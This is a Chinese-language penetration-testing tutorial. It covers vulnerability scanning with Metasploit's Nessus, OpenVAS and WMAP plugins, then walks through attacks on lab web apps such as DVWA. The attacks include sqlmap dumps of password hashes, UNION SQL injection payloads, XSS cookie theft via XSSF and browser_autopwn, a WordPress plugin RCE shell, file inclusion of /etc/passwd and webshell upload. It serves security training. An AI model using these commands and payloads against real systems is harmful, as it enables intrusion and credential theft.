Metaspliot进行漏洞扫描
Metasploit框架是Metasploit项目中最著名的创作,是一个软件开发、测试和利用漏洞的平台。它可以用来创建安全测试工具开发的模块,也可利用模块作为一个渗透测试系统。最初是由HD Moore在2003年创建作为一种便携式网络工具包。它是所有的安全研究人员和黑客之间最受欢迎的渗透测试工具之一。除了渗透测试,该工具还能够在网络和Web应用程序中执行一个很好的漏洞评估。它有一些著名的安全漏洞扫描器如 Nessus、 Nexpose、 open VAS 和 WMAP 内置的插件。
在本文中,我们要查看如何使用 Metasploit 内置插件来执行网络和 web 应用程序的脆弱性评估。首先我们将启动Nessus,跳转到msfconsole,我们将看到如何在Backtrack中安装 Nessus。它是很简单的 ;只需执行一步一步的命令:
首先从Nessus其官方网站上下载Linux 版本并安装它。然后注册一个免费的许可证。在成功安装后 Nessus,添加一个用户,通过键入以下命令:/opt/nessus/sbin/nessus-adduser
触发命令后,它将要求登录用户名和用户密码。为用户的特权,只需按照选项完成它。
现在我们将注册 Nessus 获得许可证。所以输入 /opt/nessus/bin/nessus-fetch –register <YOUR LICENSE>
注册之后,它会从它的官方网站开始下载所有最新的插件。这将需要一些时间来完成整个安装。在此之后,它将可以随时使用。
所以,让我们启动 msfconsole 和 load nessus .
正如我们可以在上图中看到,我们的Nessus插件加载成功。现在,输入nessus_help,它会列出所有的Nessus的命令。
现在,我们将连接到Nessus从我们的本地主机开始扫描。用于连接到localhost,使用的命令是nessus_connect <你的用户名>:<你的密码>@localhost: 8834 < ok >,在这里我们使用的是nessus_connect rohit:toor@localhost:8834 ok .
正如我们所看到的,我们的Nessus进行身份验证。现在,我们将检查Nessus的扫描策略。对于这一点,我们输入nessus_policy_list。
两个策略??,"Internal Network Scan"和"External Network Scan"可供选择(外部网络和内部网络)。首先是用于扫描内部网络漏洞,然后是用于扫描外部网络漏洞。
现在,我们要扫描目标主机。首先,我们要创建一个新的扫描。使用的命令是:nessus_scan_new <policy ID> <scan NAME> <Target IP>,例如,这里我们使用的是nessus_scan_new 2 NEW_SCAN 192.168.0.101,192.168.0.102
我们可以通过输入nessus_scan_status检查扫描过程的状态,将会显示我们的扫描过程中,状态是否已经完成或没有。在我们的列子,扫描仍然在运行,所以我们将等待一段时间。
过了一会儿,我们的扫描完成。现在,我们将通过输入nessus_report_list检查我们的报告,如下图所示,我们的扫描完成。
若要打开该报表,我们使用命令 nessus_report_hosts < 报告 ID > ; 例如,在这里我们使用 nessus_report_hosts ff2b1531-6c18-0198-9029-59ddcdb6fc3f26566c9ad609d831:
在上面的截图中我们可以看到主机 IP 192.168.0.101 的结果中有总共 85 严重性漏洞。这意味着安全漏洞的总数量是 85。
以下是不同漏洞的分类:
? Sev 0 表示高层次的漏洞;有0个。
? Sev 1 表示中等程度的漏洞;有53个。
? Sev 2 表示低级别的漏洞;有20个。
? Sev 3 表示信息漏洞;有12。
我们可以通过使用命令nessus_report_hosts_ports <Target IP> <Report ID>会看到漏洞的详细协议名称和服务,例如,这里我们使用的是nessus_report_host_ports 192.168.0.101 ff2b1531-6c18-0198-9029-59ddcdb6fc3f26566c9ad609d831:
现在,我们将这份报告发送到Nessus的控制台,所以在MSF中输入:nessus_report_get ff2b1531-6c18-0198-9029 59ddcdb6fc3f26566c9ad609d831
正如在上面的图中可以看到,我们的报告已成功导入。现在,通过Nessus的Web控制台登陆,我们能够看到我们导入的报告。
Metaspliot进行漏洞扫描(2)-Openvas46+
在这篇文章中,我们将看到如何使用Metasploit的内置插件来执行网络和Web应用程序的脆弱性评估。首先,我们将启动OpenVAS和msfconsole之前,你必须在你的系统中安装OpenVAS。在安装过程中给出的Backtrack的官方网站 http://www.backtrack-linux.org/wiki/index.php/OpenVas。只要按照步骤。现在我们开始进入我们的话题,如何通过OpenVAS进行漏洞评估。
要运行OpenVAS,在msfconsole输入load openvas,它会从它的数据库中加载并打开VAS插件。
现在,输入openvas_help,它会显示OpenVAS所有的命令。
我们要通过命令openvas_connect连接到OpenVAS服务器,它会显示完整的使用命令,这是openvas_connect username password host port <ssl-confirm> 用于连接到服务器。在我的情况下,命令是openvas_connect rohit toor localhost 9390 ok
这我们可以在上图中看到,我们的OpenVAS连接成功。现在,我们将创建扫描的目标。创建目标的命令是openvas_target_create <scan NAME> <target IP> <any comments>。在下面的图中,我们可以看到我的扫描名称是windows7的,目标是192.168.0.101和注释是new_scan,所以命令是openvas_target_create"windows7″ 192.168.0.101″new_scan"
创建目标后,我们希望看到OpenVAS的扫描配置列表,那么请输入openvas_config_list。
OpenVAS 有四种类型的扫描配置 ; 我们将按要求选择此选项。下一步输入 openvas_target_list ,它将显示您创建的目标。
现在我们有一个目标,我们也看到了扫描的配置,所以我们将创建一个任务来扫描我们的目标机器。
要创建任务,该命令是openvas_task_create <scanname> <COMMENT> <scanconfig ID> <targetID>
例如,在上面的图中,我们输入openvas_task_create windows7 new_scan 3 1
我们可以看到,我们创建的任何和任务ID,我们的目标机器为0。现在,通过输入openvas_task_start <taskID>启动任务。这里我们使用openvas_task_start 0
正如我们所看到的,启动命令后,我们提交请求,这意味着我们的扫描现在应该开始。让我们通过输入open_vas_list检查,它表明我们的扫描状态运行和进步是1,这意味着1%。
等待一段时间,并再次检查进度。
现在进度是80%,这意味着它几乎完整。当扫描完成后,进度将显示-1。和状态显示"Done"。
现在我们的扫描完成,所以我们可以下载该报告;输入 openvas_report_list ,它将显示数据库中的所有报告。
有几种格式供下载的报告。输入openvas_format_list,它会列出所有可用的格式。
选择格式后,我们就可以使用这个命令下载报告:openvas_report_download <report id> <format id> <path for saving report> <report name>。这里我们使用openvas_report_download 1 5 /root/Desktop report
该OpenVAS报告格式有一个bug:每当我试图下载PDF或XML格式,它给出了空白报表,所以我再次下载该报告的HTML格式,这种格式是工作正常。
Metaspliot进行漏洞扫描(3)-wamp
在前面的文章中,我们学会了如何使用OpenVAS插件来进行网络脆弱性评估。在这种延续中,我们将看到如何使用WMAP插件来执行Web应用程序漏洞评估。
WMAP最初是从一个名为SQLMap的工具创建了一个功能丰富的Web漏洞扫描程序。该工具集成了Metasploit工具,使我们能够从框架内进行web应用扫描。
启动msfconsole和load WMAP
它会从它的数据库中加载并打开WMAP插件。现在,输入help,它会显示WMAP所有使用的命令。
正如在上面的图中可以看出,wmap_sites命令是用来管理网站,所以我们要使用这个命令。输入wmap_sites -H ,它会显示用于管理所有网站使用的选项。
在上图中,我们可以看到,-a选项添加一个站点。因此,让我们使用这个选项添加一个站点。输入wmap_site -a <目标>。在这里,我们在本地机器上托管的Web应用程序。这就是为什么我们的目标IP是一个本地IP地址:wmap_sites -a http://192.168.0.102
一旦创建了该网站,我们可以检查我们添加的站点,通过输入 wmap_sites-l 将会列出这些。
我们网站已添加,现在我们将添加目标。在第一次使用输入 wmap_targets -h 命令来列出所有 wmap_targets 用法选项。
正如我们可以在使用选项看到,我们可以通过两种方式添加我们的目标。一个是-T,为此我们必须提供目标URL。如果我们使用-D,我们必须给出目标站点ID。在这里,我们将使用-d选项。因此我们的命令是wmap_targets -D 0
添加目标ID后,我们可以看到它加载的目标地址。现在我们可以检查列表,查看我们的目标是增加,输入wmap_targets -L
现在一切都准备好了,目标被成功添加,我们可以运行我们的WMAP用于扫描Web应用程序。扫描命令wmap_run,但是,在运行此命令之前,检查所有的使用方式选项。输入wmap_run-H
我们可以在选项中看到,-t 是为检查所有启用的模块,用于扫描。所以输入 wmap_run-t
触发该命令后,它会显示所有不同的测试模块。
现在,键入wmap_run -E ,它会开始扫描所有启用的模块。
这将需要一些时间,具体取决于有多大的应用。扫描完成后,它会看起来像这样。
现在,我们可以通过输入vulns查询所有漏洞。
我们可以看到在上图中,在检测到该应用程序上启用跟踪方法和脆弱性引用 CVE ID、 OSVD、 BID等,都显示。
本文由InfoSecLab 整理翻译,如有翻译和编辑错误,请联系管理员,我们将尽快处理,转载请保留版权,谢谢,希望本文对你有所帮助。
MSF扫描结合web渗透攻击技术
1.跨站脚本
反射型:利用邮件给受害者发送个恶意链接,受害者点击时,恶意链接指向的服务器将注入的文件"反射"到受害者的浏览器上,并执行恶意文件。
存储型:利用论坛、博客等web站点,将恶意脚本连同正常信息一起注入帖子内容中,并随帖子一起存储到论坛、博客服务器,当有用户浏览该帖子时,恶意脚本将在浏览器上运行。
DOM型:构造一个URL链接,链接上包含有javascript等脚本,当受害者点击这个URL时,将请求并执行脚本。
2.使用metasploit自带的wmap web扫描器
msf > db_connect -y /opt/metasploit/config/database.yml
msf > load wmap
.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] === et [ ] metasploit.com 2012
[*] Successfully loaded plugin: wmap
wmap Commands
=============
Command Description
------- -----------
wmap_modules Manage wmap modules
wmap_nodes Manage nodes
wmap_run Test targets
wmap_sites Manage sites
wmap_targets Manage targets
wmap_vulns Display web vulns
添加目标网站
msf > wmap_sites -a http://10.10.10.129
msf > wmap_sites -l
添加扫描目标
msf > wmap_targets -t http://10.10.10.129
查看将使用的模块
msf > wmap_run -t
扫描并进行攻击
msf > wmap_run -e
[*] 10.10.10.129 (Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1 Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1) WebDAV disabled.
[*] Module auxiliary/scanner/http/robots_txt
[*] [10.10.10.129] /robots.txt found
服务器的信息和敏感文件都找到了
再通过vulns查看漏洞信息
msf > vulns
[*] Time: 2013-10-22 00:56:24 UTC Vuln: host=10.10.10.129 name=HTTP Trace Method Allowed refs=CVE-2005-3398,CVE-2005-3498,OSVDB-877,BID-11604,BID-9506,BID-9561
[*] Time: 2013-10-22 00:06:40 UTC Vuln: host=10.10.10.130 name=Microsoft Server Service Relative Path Stack Corruption refs=CVE-2008-4250,OSVDB-49243,MSB-MS08-067,URL-http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos
结果还是不错的。
metasploit的渗透模块在module中的文件夹下,主要集中在exploit/unix/webapp exploit/windows/http exploit/multi/http.
3.开源的web漏洞扫描工具
wapiti 对sql注入的扫描准确度排名第一
w3af 功能强大,配置繁琐
sandcat 对XSS检测效率最好
burp suite web渗透利器
4.扫描神器w3af
支持读入配置好的脚本文件,也可以将下面一段直接复制进去
plugins
bruteforce
bruteforce formAuthBrute
bruteforce config formAuthBrute
set passwdFile True
set usersFile True
back
audit xss,sqli
discovery webSpider
discovery config webSpider
set onlyForward True
back
back
target
set target http://www.dvssc.com/dvwa/index.php
back
plugins
output htmlFile
output config htmlFile
set verbose True
set fileName aa.html
back
back
start
结果如下
SQL injection in a MySQL database was found at: "http://www.dvssc.com/dvwa/login.php", using HTTP method POST. The sent post-data was: "username=d'z"0&Login=Login&password=FrAmE30.". The modified parameter was "username". This vulnerability was found in the request with id 311.
URL : http://www.dvssc.com/dvwa/login.php
Severity : High
值得一提的是:w3af还有很多小工具保存在tools目录下,如base64decode,md5hash等。
5.SQL注入漏洞的探测
登陆语句一般为select * from * where user='**' and pass='**'
改成这样就直接绕过了
select * from * where user='admin' or '1=1'and pass='**' 即输入admin' or '1=1
里面有个专门用来学习sql注入的网页,我们试试sqlmap
root@bt:~# cd /pentest/database/sqlmap
在使用之前我们需要知道referer 和cookie的值
可以使用火狐的tamperdata,我的火狐版本较高,这个不兼容,这里使用的是wireshark
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45'
[10:29:07] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[10:29:07] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[10:29:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
获得信息较详细了
获取数据库名
./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45' --dbs -v 0
[10:38:55] [WARNING] reflective value(s) found and filtering out
available databases [2]:
[*] dvwa
[*] information_schema mysql默认的
获取表名
./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45' -D dvwa --tables
[10:41:17] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
获取列名
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45' -D dvwa --tables -T users --columns
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| avatar | varchar(70) |
| first_name | varchar(15) |
| last_name | varchar(15) |
| password | varchar(32) |
| user | varchar(15) |
| user_id | int(6) |
+------------+-------------+
导出password列的内容
./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45' -D dvwa --tables -T users --columns --dump
recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: dvwa
Table: users
[5 entries]
+---------+---------+-------------------------------------------------+----------------------------------+-----------+------------+
| user_id | user | avatar | password | last_name | first_name |
+---------+---------+-------------------------------------------------+----------------------------------+-----------+------------+
| 1 | admin | http://owaspbwa/dvwa/hackable/users/admin.jpg | 21232f297a57a5a743894a0e4a801fc3 | admin | admin |
| 2 | gordonb | http://owaspbwa/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 | Brown | Gordon |
| 3 | 1337 | http://owaspbwa/dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b | Me | Hack |
| 4 | pablo | http://owaspbwa/dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 | Picasso | Pablo |
| 5 | smithy | http://owaspbwa/dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 | Smith | Bob |
+---------+---------+-------------------------------------------------+----------------------------------+-----------+------------+
剩下的就是破解MD5值了
值得一提的是,sqlmap 还支持通过数据库注入一个交互的shell
root@bt:/pentest/database/sqlmap# ./sqlmap.py -h | grep shell
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an out-of-band shell, meterpreter or VNC
--os-shell 提供四种不同的shell(ASP,ASPX,PHP,JSP)
我们再试试手工注入
输入1时
ID: 1
First name: admin
Surname: admin
说明这是个查询 语句类似于: select firstname,surname from table where id='1'
输入' or '1'='1'#
看到所有的结果
输入1' order by 3# 出错
说明表里面只有两列
mysql有个默认的数据库information_schema,里面有个叫tables的表,里面保存了整个Mysql所有库、表的信息
table_schema和table_name是其中表示库名和表名的两列
' union select 1,table_name from information_schema.tables#
这样我们就得到了除系统自带表以外的表了,这里最后两个是用户自己添加的
ID: ID: ' union select table_schema,table_name from information_schema.tables#
First name: dvwa
Surname: guestbook
ID: ID: ' union select table_schema,table_name from information_schema.tables#
First name: dvwa
Surname: users
很轻松的得到了库名和表名,我们关心的是users表
mysql默认的数据库information_schema有张表还保存了每张表的列名,表名为columns
意味着我们还能查询到users表的所有列名
' union select 1,column_name from information_schema.columns where table_name='users'#
ID: ' union select 1,column_name from information_schema.columns where table_name='users'#
First name: 1
Surname: user_id
ID: ' union select 1,column_name from information_schema.columns where table_name='users'#
First name: 1
Surname: first_name
ID: ' union select 1,column_name from information_schema.columns where table_name='users'#
First name: 1
Surname: last_name
ID: ' union select 1,column_name from information_schema.columns where table_name='users'#
First name: 1
Surname: user
ID: ' union select 1,column_name from information_schema.columns where table_name='users'#
First name: 1
Surname: password
ID: ' union select 1,column_name from information_schema.columns where table_name='users'#
First name: 1
Surname: avatar
那么就剩下获取字段的内容了
' union select user,password from dvwa.users#
ID: ' union select user,password from dvwa.users#
First name: admin
Surname: 21232f297a57a5a743894a0e4a801fc3
ID: ' union select user,password from dvwa.users#
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03
ID: ' union select user,password from dvwa.users#
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: ' union select user,password from dvwa.users#
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: ' union select user,password from dvwa.users#
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
ID: ' union select user,password from dvwa.users#
First name: user
Surname: ee11cbb19052e40b07aac0ca060c23ee
大功告成!
6.XSS漏洞探测 W3AF
plugins
audit xss
discovery webSpider
discovery config webSpider
set onlyForward True
back
back
target
set target http://www.dvssc.com/mutillidae/?page=add-to-your-blog.php
back
plugins
output htmlFile
output config htmlFile
set verbose True
set fileName mutillidae.html
back
back
start
结果是:
Cross Site Scripting was found at: "http://www.dvssc.com/mutillidae/index.php?page=add-to-your-blog.php", using HTTP method POST. The sent post-data was: "input_from_form=
URL : http://www.dvssc.com/mutillidae/index.php
Severity : Medium
7.web应用程序漏洞探测
wXf是一个web应用漏洞扫描和攻击工具
https://github.com/WebExploitationFramework/wxf
BT5的Ruby版本有点低,在kali上能很好的运行
这里面支持一个wordpress的扫描模块
8.XSS跨站攻击
javascript能够很好的增加网页的丰富多样性,因而使用还是比较广泛的。
想成功执行一个XSS,需要两个步骤:
1.攻击者发送的数据没有被过滤或是删除。
2.web应用返回的数据没有经过编码。
对于一个安全的web应用来说,返回页面的每一个特殊字符包括& < > 、 /都应该经过编码,最好是进行16进制编码。
针对http://www.dvssc.com/dvwa/vulnerabilities/xss_r这个网站
当我们输入
直接弹框XSS
很明显的一个反射式跨站漏洞。
而存储型的跨站攻击并不需要直接对网站的某个输入点进行输入,而是长期存储在web应用中并作为一个内容。
对于存储型的http://www.dvssc.com/dvwa/vulnerabilities/xss_s/
在发表文章的撰写文章并提交,在输入框中输入
而这个js里面就包括了获取session和cookie的代码。
当别人访问你的文章时,信息就被窃取了。
9.跨站脚本攻击框架XSSF
https://code.google.com/p/xssf/downloads/list下载
把里面的四个文件夹data,lib,modules和plugin合并到/opt/framework/msf3里面的文件夹
msf > load xssf
msf > xssf_urls
[+] XSSF Server : 'http://192.168.0.4:8888/' or 'http://:8888/'
[+] Generic XSS injection: 'http://192.168.0.4:8888/loop' or 'http://:8888/loop'
[+] XSSF test page : 'http://192.168.0.4:8888/test.html' or 'http://:8888/test.html'
以上就是我们的攻击配置文件
当我们把链接 http://192.168.0.4:8888 通过存储式跨站加入到博客里面,当第三方浏览这个博客同时点击这个链接时,就能看到点击者的信息。
查看被攻击者的信息
msf > xssf_victims
查看具体主机
msf > xssf_information 4
如果是低版本的IE浏览器
我们可以使用相关的攻击模块
msf > use auxiliary/server/browser_autopwn
接着是使用metasploit的反弹回连模块
msf >jobs
msf >xssf_exploit 2 14
最后得到一个meterpreter
10.命令注入攻击
wordpress zingiri plugin渗透代码,是一个php脚本
当然前提是wordpress装有这个插件,并且还存在漏洞。
root@bt:~/Desktop# php exp.php 10.10.10.129 /wordpress/
+----------------------------------------------------------------------------------+
| Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit by EgiX |
+----------------------------------------------------------------------------------+
zingiri-shell#
zingiri-shell# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
得到了一个shell,但是这个shell和www-data这个账号的权限是相同的,还不够高
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/sh
11.文件包含和文件上传漏洞
针对文件包含漏洞的页面,也许改个参数你就能知道很多信息
http://192.168.0.3/dvwa/vulnerabilities/fi/?page=include.php
改成
http://192.168.0.3/dvwa/vulnerabilities/fi/?page=/etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:102::/home/syslog:/bin/false klog:x:102:103::/home/klog:/bin/false mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false landscape:x:104:122::/var/lib/landscape:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin postgres:x:106:109:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash messagebus:x:107:114::/var/run/dbus:/bin/false tomcat6:x:108:115::/usr/share/tomcat6:/bin/false user:x:1000:1000:user,,,:/home/user:/bin/bash polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false haldaemon:x:110:119:Hardware abstraction layer,,,:/var/run/hald:/bin/false pulse:x:111:120:PulseAudio daemon,,,:/var/run/pulse:/bin/false postfix:x:112:123::/var/spool/postfix:/bin/false
这就有了很多信息了。
对于文件长传漏洞,上传特制的带有webshell的文件,然后将page=提成远程主机上webshell的url,这样就有了webshell,可以执行shell命令了。